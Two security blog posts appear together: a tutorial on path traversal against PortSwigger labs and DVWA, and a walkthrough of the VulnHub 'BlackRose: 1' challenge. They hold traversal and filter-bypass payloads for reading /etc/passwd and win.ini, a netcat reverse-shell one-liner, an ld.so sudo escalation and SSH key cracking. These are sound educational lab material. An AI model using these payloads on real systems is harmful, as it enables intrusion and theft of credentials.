Introduction

Linux Server Path_Traversal Exploitation

• Basic Path Traversal
• Blocked Traversal Sequence
• Validated Path Traversal
• Path Disclosure in URL
• Null Byte Bypass

Windows Server Path_Traversal Exploitation

• Basic Path Traversal
• Double dots with Forward-Backward Slashes
• Blocked Traversal Sequences

Mitigation Steps

Introduction

Path Traversal sometimes also termed as “Directory Traversal” is an HTTP vulnerability which allows an attacker to trick and manipulate the web application’s URL to access the files or directories that resides outside the application’s root folder. This vulnerability carries when a developer fails to establish or manage the input validations while including the files such as images, static texts, codes, etc. in their web applications.

However, in such attacks, the attacker manipulates the web application input fields by entering the dot-dot-slash (../) sequences or some similar variations, to bypass the web page and access the desired system file.

Thus this vulnerability has been reported as “High with a CVSS score of 7.3” under :

1. CWE-22: “Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)”
2. CWE-35: “Path Traversal: ‘…/…//’ “
3. CWE 73: “Directory Traversal”
4. CWE-200: “Exposure of Sensitive Information to an Unauthorized Actor”

Let’s check out this scenario and learn how an attacker defaces the web-application by grabbing the server’s sensitive files.

Here, the user calls up a file – index.php through the web application’s URL i.e. http://abc.com/file=index.php. Thus the application process the URL and calls up the index.php that was present locally into the server folder “RAJ” as “/var/www/html/RAJ”.

The developer uses the “include” functionality as “file=” with a simple intention to manage the user’s selected input files, such that the application can directly call it from the local server. Now the attacker tries to manipulate the URL using the dot-dot-slash sequence as http://abc.com/file=../../../../etc/passwd, to retrieve the contents of the server’s password file.

Thus again the application will process it and reads up the file at /var/www/html/RAJ/../../../../etc/passwd. Every “../” represents – back to parent directory, thus if we call up “../” for four times, it will put us in the “root” directory, from there we can simply access the password file as etc/passwd.

Linux Server Path_Traversal Exploitation

Let’s now try to implement this in some real scenarios and check the different attacking sequences rather than the dot-dot-slash only.

For all this, I’ll be using two different platforms The Portswigger Academy and DVWA which contains the path traversal vulnerability.

Basic Path Traversal

Login into the PortSwigger academy and drop down till Directory Traversal to get into its labs, choose the first lab as “File path traversal, the simple case” and hit the “Access the lab” button.

Here you’ll now be redirected to an e-commerce website, which is having several products in its catalogue and is suffering from path traversal vulnerability.

As to further, I’ve opened a product and checked out its display image with a simple right-click as view image.

Now its time to check what we could manipulate.

Tune in your burp suite in order to capture the ongoing HTTP Request and share it all with the Repeater.

As in the GET request, above in the image, you can notice that the filename=67.jpg, let’s try to change this filename with

filename=../../../etc/passwd

Great!! From the below image, you can see that we’ve successfully grabbed the passwd file.

Blocked Traversal Sequence

There are situations when the developers end up the traversal process, i.e. the dot-dot-slash or any subsequent sequence will not work in such case.

While getting to the second lab, I got the same issue i.e. the “../” sequence didn’t work and I fail to capture the password file. So let’s try to capture this request again in our burpsuite monitor.

From the below image, you can see that I’ve grabbed up the request with filename=66.jpg, and now will shift this all to the Repeater.

As we’re blocked with the “../” sequence. Let’s try to enter /etc/passwd without any preceding values.

Cool!! This worked, we got the password file with the direct call.

Validated Path Traversal

Many developers validate their web-applications, that if the “../” comes into the URL, it gets rejected out. Thus when we tried both the above procedures in our next lab, we got rejected out and didn’t grab anything.

Therefore we capture the HTTP request in our burpsuite and traverse it to the Repeater.

This time we manipulate the URL filename parameter with “double dots followed by double slashes” i.e. “….//….//….//etc/passwd”

Great!! From the above image, you can see that we’ve again captured the password file with this unusual technique.

As we jumped over the 4^th lab, we got this, the developers had made a validation which blocks up the input which contains the path traversal sequence.

Therefore to bypass this validation, I’ve again captured the request and send it to the repeater, to make some manipulations.

From the below image, you can see that, I’ve manipulated the URL filename parameter using Double URL encoding method in order to convert “../” into “..%252f” with the help of  ASCII to URL encoder converter and have successfully accessed the password file with

filename=..%252f..%252f..%252fetc/passwd

Path Disclosure in URL

Isn’t it great if you get the number of back steps you need to perform in order to capture your desired file?

Path disclosure is that vulnerability, where the URL offers the complete path of the file it is containing, which thus allows the attacker to simply manipulate the URL and with no efforts he can access the system files.

As we moved further to lab 5, we were encountered with an application that was offering us the complete path of the file.

We simply just captured that request and send it to the repeater. From the below image, you can see that the filename parameter is having the value as “/var/www/images/21.jpg”. Which means that the file “21.jpg” is inside the images directory and the root directory is just 3 steps away from us.

So we are now aware of the number of back steps we need to make to get into the password file, therefore we’ll do that as

filename-/var/www/images/../../../etc/passwd

Null Byte Bypass

Many developers add up a ‘.php’ extension into their codes at the end of the required variable before it gets included.

Therefore the webserver interprets the /etc/passwd as /etc/passwd.php, thus we could not access the file. In order to get rid of this “.php” we try to terminate the variable using the null byte character (%00), that will force the php server to ignore everything after that, as soon as it is interpreted.

As soon as we share the captured request to the repeater we’ll try to eliminate this null byte character as discussed above.

So from the below image, you can see that we’ve again captured the password file by adding up (%00) in the URL as :

filename=../../../etc/passwd%00.jpg

Windows Server Path_Traversal Exploitation

It’s not necessary that every time we encounter with an application which is running over a Linux server, thus there are chances that our luck doesn’t work and we got stuck with a window’s server. Let’s learn the different sequences and the method that can be used during such situations.

Basic Path Traversal

I’m having DVWA setup over my window’s machine. You can learn this all from here.

Let’s boot inside the DVWA application as “admin: password” with the security level as “low”. Further, choose the vulnerability as File Inclusion from the left-hand panel.

As soon as we choose this, we’ll be redirected to the webpage which is suffering from path_traversal vulnerability.

Let’s capture this request through burpsuite and see what we can get through it.

From the above image, you can see that file.php is included in the page parameter. Let’s share this all to the repeater and try to play with this input field.

In order to call up the windows file on the web-applications screen, manipulate the page parameter with the following input.

page=C:/Windows/win.ini

From the above image, you can see that we’ve successfully called up the file in the response tab. Now forward this request and check the result over the application’s screen.

Double dots with Forward-Backward Slashes

Whether the application is hosted over a Linux server or a windows one, the developers always validate their web-applications. Here, in order to keep the application secure with the path traversal attacks. the developers block up some sequences such as “../”, which thus gets rejects out automatically if entered in the URL.

Increase up the DVWA’s security level and set it to “medium”. Capture the request at burpsuite and send everything directly to the repeater.

Form the below image, you can see that we’ve successfully bypassed this validation by the double dots followed by forward-backwards slashes and have again grabbed the “win.ini” file by :

page=…./\..../\..../\..../\..../\Windows/win.ini

Using a similar sequence you can even capture other files present in the windows system. From the below image you can see that I’ve grabbed up a flag i.e. fi.php which resides in the hackable folder by simply manipulating up the URL parameter as :

page=…./\..../\hackable/flags/fi.php

Blocked Traversal Sequences

There are many situations when such conditions didn’t work, that is the developer validates and blocks every possible sequence he can.

Let’s find the other possible way to get the “win.ini” file without getting involved with the commonly used sequences.

Again go for the security option and hit it up with the high security in your DVWA application. Come back to the File Inclusion section and capture the request in your burpsuite.

Share the HTTP request to the repeater tab and manipulate the URL page parameter with :

page=file://C:/Windows/win.ini

From the below image you can see that we have captured the “win.ini” file by entering the complete path to it in the URL parameter.

Let’s now try to capture the flag with the same procedure as :

page=file://C:/xampp\htdocs\dvwa\hackable\flags\fi.php

Great!! We have grabbed this hackable flag too.

Mitigation Steps

1. The developer should create a whitelist of all the files that he wants to include in order to limit the attacker’s control.
2. Develop or run the code in the most recent version of the webserver which is available. The web-applications should even be implemented with least privileges.
3. Exclusion of the directory separators “/” to prevent the web-application from the directory traversal attacks

Author: Chiragh Arora is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here

The post Comprehensive Guide on Path Traversal appeared first on Hacking Articles.

Today we are going to solve another boot2root challenge called “BlackRose: 1”.  It’s available at VulnHub for penetration testing, you can download this from here.

The credit goes to BadLamer for designing this VM machine. Let’s start and learn how we can break this down.

Level: Hard

Penetration Testing Methodology

Reconnaissance

• Nmap

Enumeration

• Steghide

Exploiting

• ByPassing PHP strcmp()
• Remote Command Execute (RCE) from the application web
• Use of cryptography and cyphers (Cyberchef & others)

Privilege Escalation

• Abuse binary ld.so
• Cracking SSH Keys with John
• Reversing binary with Ghidra
• Abuse script with Filter ByPass extensions and WAF application
• Capture the flag

Walkthrough

Reconnaissance

So, let’s start this all by running up “nmap” with an “aggressive scan”, in order to capture the ports with the enabled operating system, software versions, scripts and traceroutes.

nmap -A –p- 192.168.1.21

Enumeration

As we enter the website, we were presented with an authentication system, which thus allows us to enter some credentials or to register ourselves into it.

On the other hand, we noticed a background image behind the login portal, thus we downloaded it in order to check whether it contains any specific information or not. As we track it over the steghide tool, we got something but we lacked with a key to decipher it.

Exploiting

After trying to evade the form with other techniques, we were clear that this website is vulnerable to “strcmp“.

Let’s capture this request in burpsuite and check what we can have over in its response.

Request Burp:

Response Burp:

Great!! We execute the answer in our web browser and have bypassed the administration panel as “admin” user.

Now as we go further, inside this panel, we got a hash in “bcrypt” and there is a box to type the input command. But if you try to run the “ls” command, it will pop you back out with an error.

So let’s try to crack this captured hash through John The Ripper. As in the output result, you can see that we got the command as “whoami“.

Let’s now try to execute the “whoami” command in the web-application.

Very well, as we are not aware of the application’s procedures, let’s then try to generate a hash in “bcrypt” with a command that will allow us to raise a reverse shell from our kali machine.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.22 1234 >/tmp/f

We’ll now set up a netcat listener at port 1234. Further, change up the field hash and rewrite the command:

Great!! We’ve successfully captured the victim’s Shell.

Privilege Escalation (user “delx”)

Thus with the help of python, we’ll have our interactive shell, now it’s time to get the privileges of the “delx” user.

To do this, we will execute the command “sudo -l” and check whether we can make the use of a binary called “ld.so”, as easy as running:

sudo -u delx /bin/ld.so /bin.sh

From the below image, you can see that we got the shell with the user.

As we traverse the files of the user “delx“,  we encounter that it is having the directory as  “.ssh”, copy the “id_rsa” file and try to crack it with “ssh2john“, JohnTheRipper and the rockyou dictionary.

Great!! We can now connect it via SSH!

Privilege Escalation (user “yourname”)

Let’s surf the files that were having access to the user “delx” and during the procedure, we were encountered with a binary file called “showPassword“.

Thus the binary will be used to check a password to decipher the content that is marked in green.

We will analyze the code with Ghidra (you can even use some other), check for its decompiler and list the password inside it.

We go back to the binary, type the password and check whether it is correct or not.

Let’s try to decipher the content over some online tools. I’ve used AES encryption to do so. From the below image, you can see that we are now again having another encrypted text to entertain.

After testing this key with all the 3 users, it didn’t work for any of them. Do you remember the background image that we’ve downloaded in the beginning?

Let’s try to do it here.

After checking every possible way, we finally decrypted it as “ROT47“.

Let’s now try the password with the user “yourname” and therefore we’ve finally captured the flag of “user.txt“.

Privilege Escalation (root)

Fire up “sudo -l” and list a script which we can execute as “root“.

As we tried to execute it, we got prompted with a message as “Invalid file read”

It’s clear that we do not have access to the script, but it is also understandable that it can be filtered by the extensions.

After trying to read different extensions, we find one that worked for us i.e. “PHP“!

As you can see, it passes the extension filter, but it doesn’t run the content. This can be because the script might have the “WAF” function and filters some words.

After some documentation, I modified the proof of concept and I managed to bypass the “WAF“.

Well, let’s not waste any more time, and add up “/bin/sh” in order to capture the root’s shell to read the contents of the file “root.txt“.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks Contacted on LinkedIn and Twitter.

The post BlackRose: 1 Vulnhub Walkthrough appeared first on Hacking Articles.